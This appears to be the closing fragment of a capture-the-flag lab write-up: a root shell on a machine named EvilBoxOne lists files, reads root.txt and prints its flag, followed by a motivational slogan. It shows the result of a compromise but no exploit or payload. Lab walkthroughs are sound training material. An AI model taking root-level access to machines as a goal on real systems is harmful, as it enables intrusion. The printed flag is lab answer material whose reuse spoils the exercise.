drwxr-xr-x 3 root root 4,0K ago 16 2021 .local
-rw-r--r-- 1 root root 148 ago 17 2015 .profile
-r-------- 1 root root 31 ago 16 2021 root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
root@EvilBoxOne:~#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
